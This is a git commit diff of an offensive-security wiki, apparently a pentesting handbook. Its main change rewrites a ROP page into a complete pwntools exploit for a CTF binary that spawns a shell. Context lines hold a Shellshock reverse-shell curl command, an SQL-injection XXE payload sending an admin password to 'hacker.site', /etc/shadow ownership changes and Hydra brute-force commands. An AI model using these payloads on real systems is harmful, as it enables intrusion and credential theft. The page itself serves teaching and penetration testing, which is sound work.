GitBook: [master] 19 pages and 4 assets modified

2024-11-22 04:33:28 +00:00 · 2021-09-25 16:33:43 +00:00 · 2021-09-25 16:33:43 +00:00 · 9d85603d35
commit 9d85603d35
parent c59e78e9c2
21 changed files with 219 additions and 78 deletions
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -514,7 +514,7 @@
 * [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
  * [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md)
-  * [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
+  * [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
  * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
  * [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md)
  * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
--- a/exploiting/linux-exploiting-basic-esp/README.md
+++ b/exploiting/linux-exploiting-basic-esp/README.md
@ -27,12 +27,6 @@ Heap**
 **Stack**
 ## **1.STACK OVERFLOWS**
 > buffer overflow, buffer overrun, stack overrun, stack smashing
 Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
 **Sección BSS**: Variables globales o estáticas sin inicializar
 ```text
@ -51,19 +45,27 @@ int i = 5;
 **Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\)
 ## **1.STACK OVERFLOWS**
 > buffer overflow, buffer overrun, stack overrun, stack smashing
 Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
 \*\*\*\*
 Para obtener la dirección de una función dentro de un programa se puede hacer:
 ```text
 objdump -d ./PROGRAMA | grep FUNCION
 ```
 Si necesitas una dirección del Stack el GDB modifica variables de entorno que hae que cambie la dirección con respecto ala ejecución normal:
-* `unset env LINES`
+
-* `unset env COLUMNS`
+## ROP
-* `set env _=path` donde path es la ruta absoluta al programa
+
-* explotar el programa usando la ruta absoluta
+### Call to sys\_execve
-* asegúrate de que PWD y OLDPWD son las mismas que en gdb
+
 {% page-ref page="rop-syscall-execv.md" %}
 ## **2.SHELLCODE**
--- a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
+++ b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
@ -1,51 +1,164 @@
-# ROP - Syscall execv
+# ROP - call sys\_execve
-The objective is to call the **syscall \(execv\)** from a ROP controlling the value of registries: _RDI, RSI, RDX, RAX_ and obviously the _RIP_ \(the other ones doesn't matters\), and controlling somewhere to write _"/bin/sh"_
+In order to prepare the call for the **syscall** it's needed the following configuration:
-* **RDI**: Pointing to the string "/bin/bash"
+* `rax: 59 Specify sys_execve`
-* **RSI**: Null
+* `rdi: ptr to "/bin/sh" specify file to execute`
-* **RDX**: Null
+* `rsi: 0 specify no arguments passed`
-* **RAX**: Value **0x3b** for x64 and **0xb** for x32, because this will call **execv**
+* `rdx: 0 specify no environment variables passed`
 So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` \(being aware of the padding needed to control the stack\).
 ## Control the registers
 Let's start by finding **how to control those registers**:
 ```c
 ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
 0x0000000000415664 : pop rax ; ret
 0x0000000000400686 : pop rdi ; ret
 0x00000000004101f3 : pop rsi ; ret
 0x00000000004498b5 : pop rdx ; ret
 ```
 With these addresses it's possible to **write the content in the stack and load it into the registers**.
 ## Write string
 ### Writable memory
 Frist you need to find a writable place in the memory
 ```bash
-ROPgadget --binary vulnbinary | grep syscall
+gef> vmmap
-ROPgadget --binary vulnbinary | grep "rdi\|rsi\|rdx\|rax" | grep pop
+[ Legend:  Code | Heap | Stack ]
 Start              End                Offset             Perm Path
 0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
 0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
 0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
 ```
-## Writing
+### Write String
-If you can somehow write to an address and then get the address of where you have written then this step is unnecessary.
+Then you need to find a way to write arbitrary content in this address
-Elsewhere, you may search for some **write-what-where**.  
+```python
-As is explained in this tutorial: [https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/](https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/) you have to find something that allows you to save some value inside a registry and then save it to some controlled address inside another registry. For example some `pop eax; ret` , `pop edx: ret` , `mov eax, [edx]`
+ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
-
+mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
 You can find mov gadgets doing: `ROPgadget --binary vulnbinary | grep mov`
 ### Finding a place to write
 If you have found some **write-what-where** and can control the needed registries to call execv, there is only left finding a place to write.
 ```bash
 objdump -x vulnbinary | grep ".bss" -B1
                  CONTENTS, ALLOC, LOAD, DATA
 23 .bss          00000010  00403418  00403418  00002418  2**3
 ```
-In this case: **0x403418**
+#### 32 bits
-### **Writing** _**"/bin/sh"**_
+```python
 '''
 Lets write "/bin/sh" to 0x6b6000
-```text
+pop rdx, 0x2f62696e2f736800
-buffer += address(pop_eax) # place value into EAX
+pop rax, 0x6b6000
-buffer += "/bin"           # 4 bytes at a time
+mov qword ptr [rax], rdx
-buffer += address(pop_edx)         # place value into edx
+'''
 buffer += address(writable_memory)
 buffer += address(writewhatwhere)
-buffer += address(pop_eax)
+rop += popRdx           # place value into EAX
-buffer += "//sh"
+rop += "/bin"           # 4 bytes at a time
-buffer += address(pop_edx)
+rop += popRax           # place value into edx
-buffer += address(writable_memory + 4)
+rop += p32(0x6b6000)    # Writable memory
-buffer += address(writewhatwhere)
+rop += writeGadget   #Address to: mov qword ptr [rax], rdx
 rop += popRdx
 rop += "//sh"
 rop += popRax
 rop += p32(0x6b6000 + 4)
 rop += writeGadget
 ```
 #### 64 bits
 ```python
 '''
 Lets write "/bin/sh" to 0x6b6000
 pop rdx, 0x2f62696e2f736800
 pop rax, 0x6b6000
 mov qword ptr [rax], rdx
 '''
 rop = ''
 rop += popRdx
 rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
 rop += popRax
 rop += p64(0x6b6000) # Writable memory
 rop += writeGadget #Address to: mov qword ptr [rax], rdx
 ```
 ## Example
 ```python
 from pwn import *
 target = process('./speedrun-001')
 #gdb.attach(target, gdbscript = 'b *0x400bad')
 # Establish our ROP Gadgets
 popRax = p64(0x415664)
 popRdi = p64(0x400686)
 popRsi = p64(0x4101f3)
 popRdx = p64(0x4498b5)
 # 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
 writeGadget = p64(0x48d251)
 # Our syscall gadget
 syscall = p64(0x40129c)
 '''
 Here is the assembly equivalent for these blocks
 write "/bin/sh" to 0x6b6000
 pop rdx, 0x2f62696e2f736800
 pop rax, 0x6b6000
 mov qword ptr [rax], rdx
 '''
 rop = ''
 rop += popRdx
 rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
 rop += popRax
 rop += p64(0x6b6000)
 rop += writeGadget
 '''
 Prep the four registers with their arguments, and make the syscall
 pop rax, 0x3b
 pop rdi, 0x6b6000
 pop rsi, 0x0
 pop rdx, 0x0
 syscall
 '''
 rop += popRax
 rop += p64(0x3b)
 rop += popRdi
 rop += p64(0x6b6000)
 rop += popRsi
 rop += p64(0)
 rop += popRdx
 rop += p64(0)
 rop += syscall
 # Add the padding to the saved return address
 payload = "0"*0x408 + rop
 # Send the payload, drop to an interactive shell to use our new shell
 target.sendline(payload)
 target.interactive() 
 ```
 ## References
 * [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)
--- a/exploiting/tools/README.md
+++ b/exploiting/tools/README.md
@ -24,7 +24,7 @@ msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread]
 apt-get install gdb
 ```
-### Parameters:
+### Parameters
 **-q** --&gt; No show banner  
 **-x &lt;file&gt;** --&gt; Auto-execute GDB instructions from here  
@ -91,6 +91,32 @@ pattern search "avaaawaa" #Search for the offset of that substring
 pattern search $rsp #Search the offset given the content of $rsp
 ```
 ### Tricks
 #### GDB same addresses
 While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
 * `unset env LINES`
 * `unset env COLUMNS`
 * `set env _=<path>` _Put the absolute path to the binary_
 * Exploit the binary using the same absolute route
 *  `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
 #### Backtrace to find functions called
 When you have a **statically linked binary** all the functions will belong to the binary \(and no to external libraries\). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.  
 You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** \(**backtrace**\) command to see the functions called:
 ```text
 gef➤  bt
 #0  0x00000000004498ae in ?? ()
 #1  0x0000000000400b90 in ?? ()
 #2  0x0000000000400c1d in ?? ()
 #3  0x00000000004011a9 in ?? ()
 #4  0x0000000000400a5a in ?? ()
 ```
 ### GDB server
 `gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\)
--- a/linux-unix/privilege-escalation/linux-capabilities.md
+++ b/linux-unix/privilege-escalation/linux-capabilities.md
@ -744,7 +744,7 @@ And in order to read a file you could do:
 print(open("/etc/shadow", "r").read())
 ```
-#### Example with _\*\*_Environment \(Docker breakout\)
+#### Example with \_\*\*\_Environment \(Docker breakout\)
 You can check the enabled capabilities inside the docker container using:
@ -1124,6 +1124,7 @@ python -c 'import os;os.chown("/etc/shadow",1000,1000)'
 ```
 Or with the **`ruby`** binary having this capability:
 ```bash
 ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
 ```
--- a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md
+++ b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md
@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
 * Signed using the **device identity certificate \(from APNS\)**
 * **Certificate chain** includes expired **Apple iPhone Device CA**
-![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
+![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
 ### Step 6: Profile Installation
--- a/pentesting-web/dangling-markup-html-scriptless-injection.md
+++ b/pentesting-web/dangling-markup-html-scriptless-injection.md
@ -5,7 +5,7 @@
 This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.  
 It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
-Several techniques commented here can be used to bypass some ****[**Content Security Policy**](content-security-policy-csp-bypass.md) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
+Several techniques commented here can be used to bypass some **\*\*\[**Content Security Policy\*\*\]\(content-security-policy-csp-bypass.md\) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
 ## Main Applications
@ -207,8 +207,7 @@ This can be mitigated with something like: _**sandbox=’ allow-scripts allow-to
 ### &lt;meta abuse
-You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`   
+You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
 This can be **avoided** with a **CSP** regarding **http-equiv** \( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`\)
@ -227,21 +226,19 @@ Not all the ways to leak connectivity in HTML will be useful for Dangling Markup
 ## Brute-Force Detection List
-{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" %}
+{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" caption="" %}
 ## References
 All the techniques presented here and more can view reviewed with more details in:
-{% embed url="http://lcamtuf.coredump.cx/postxss/" %}
+{% embed url="http://lcamtuf.coredump.cx/postxss/" caption="" %}
 Another HTML tags that can be abused can be find here:
-{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" %}
+{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" caption="" %}
 More info:
-{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}
+{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" caption="" %}
--- a/pentesting-web/file-inclusion/README.md
+++ b/pentesting-web/file-inclusion/README.md
@ -29,7 +29,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
 **Mixing several \*nix LFI lists and adding more paths I have created this one:**
-{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" %}
+{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" caption="" %}
 Try also to change `/` for `\`  
 Try also to add `../../../../../`
@ -40,7 +40,7 @@ A list that uses several techniques to find the file /etc/password \(to check if
 Merging several lists I have created:
-{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" %}
+{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" caption="" %}
 Try also to change `/` for `\`  
 Try also to remove `C:/` and add `../../../../../`
@ -53,7 +53,7 @@ Check the LFI list of linux.
 ## Basic LFI and bypasses
-All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)\).
+All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt%29\).
 ```text
 http://example.com/index.php?page=../../../etc/passwd
@ -330,7 +330,7 @@ Other possible log paths:
 /var/log/httpd/error_log
 ```
-Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
+Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
 ### Via Email
--- a/pentesting-web/sql-injection/README.md
+++ b/pentesting-web/sql-injection/README.md
@ -248,6 +248,7 @@ select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
 ```
 ### Out of band data exfiltration via XXE
 ```sql
 a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
 ```
--- a/pentesting/5985-5986-pentesting-winrm.md
+++ b/pentesting/5985-5986-pentesting-winrm.md
@ -265,7 +265,7 @@ Entry_1:
    print(s.run_ps('ipconfig'))
    https://book.hacktricks.xyz/pentesting/pentesting-winrm
-    
+
 Entry_2:
  Name: Hydra Brute Force
  Desctiption: Need User
--- a/pentesting/pentesting-ftp/README.md
+++ b/pentesting/pentesting-ftp/README.md
@ -225,7 +225,7 @@ Entry_5:
  Name: Browser Connection
  Description: Connect with Browser
  Note: ftp://anonymous:anonymous@{IP}
-  
+
 Entry_6:
  Name: Hydra Brute Force
  Description: Need Username
--- a/pentesting/pentesting-ldap.md
+++ b/pentesting/pentesting-ldap.md
@ -374,10 +374,10 @@ Entry_5:
  Name: LdapSearch Big Dump
  Description: Need Naming Context to do big dump
  Command: ldapsearch -h {IP} -x -b "{Naming_Context}"
-  
+
 Entry_6:
  Name: Hydra Brute Force
  Description: Need User
-  Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f 
+  Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
 ```
--- a/pentesting/pentesting-pop.md
+++ b/pentesting/pentesting-pop.md
@ -111,7 +111,7 @@ Entry_4:
  Name: Nmap
  Description: Scan for POP info
  Command: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP}
-  
+
 Entry_5:
  Name: Hydra Brute Force
  Description: Need User
--- a/pentesting/pentesting-smb.md
+++ b/pentesting/pentesting-smb.md
@ -499,7 +499,7 @@ Entry_4:
  Name: Nmap Smb Scan 2
  Description: SMB Vuln Scan With Nmap (Less Specific)
  Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}
-  
+
 Entry_5:
  Name: Hydra Brute Force
  Desctiption: Need User
--- a/pentesting/pentesting-smtp/README.md
+++ b/pentesting/pentesting-smtp/README.md
@ -74,7 +74,7 @@ Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`
 Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name:
-```
+```text
 220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at  Wed, 15 Sep 2021 12:13:28 +0200 
 EHLO all
 250-somedomain.com Hello [x.x.x.x]
@ -507,7 +507,7 @@ Entry_6:
  Name: Find MX Servers
  Description: Find MX servers of an organization
  Command: dig +short mx {Domain_Name}
-  
+
 Entry_7:
  Name: Hydra Brute Force
  Description: Need Nothing
--- a/pentesting/pentesting-snmp/README.md
+++ b/pentesting/pentesting-snmp/README.md
@ -210,7 +210,7 @@ Entry_4:
  Name: Nmap
  Description: Nmap snmp (no brute)
  Command: nmap --script "snmp* and not snmp-brute" {IP}
-  
+
 Entry_5:
  Name: Hydra Brute Force
  Description: Need Nothing
--- a/pentesting/pentesting-ssh.md
+++ b/pentesting/pentesting-ssh.md
@ -287,3 +287,4 @@ Entry_1:
   Description: Need Username
   Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh
 ```
--- a/pentesting/pentesting-web/README.md
+++ b/pentesting/pentesting-web/README.md
@ -373,7 +373,7 @@ Entry_10:
  Command: |
    ?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php
    wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e
-    
+
 Entry_11:
  Name: WordPress Hydra Brute Force
  Description: Need User (admin is default)
--- a/pentesting/pentesting-web/cgi.md
+++ b/pentesting/pentesting-web/cgi.md
@ -13,7 +13,7 @@ Exploiting this vulnerability the **page could throw an error**.
 You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**.
-#### **Test**
+### **Test**
 Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
@ -23,7 +23,7 @@ Most tests are based in echo something and expect that that string is returned i
 nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
 ```
-#### **Curl \(reflected, blind and out-of-band\)**
+### **Curl \(reflected, blind and out-of-band\)**
 ```bash
 # Reflected
@ -40,7 +40,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http:
 python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
 ```
-#### Exploit
+### Exploit
 ```bash
 #Bind Shell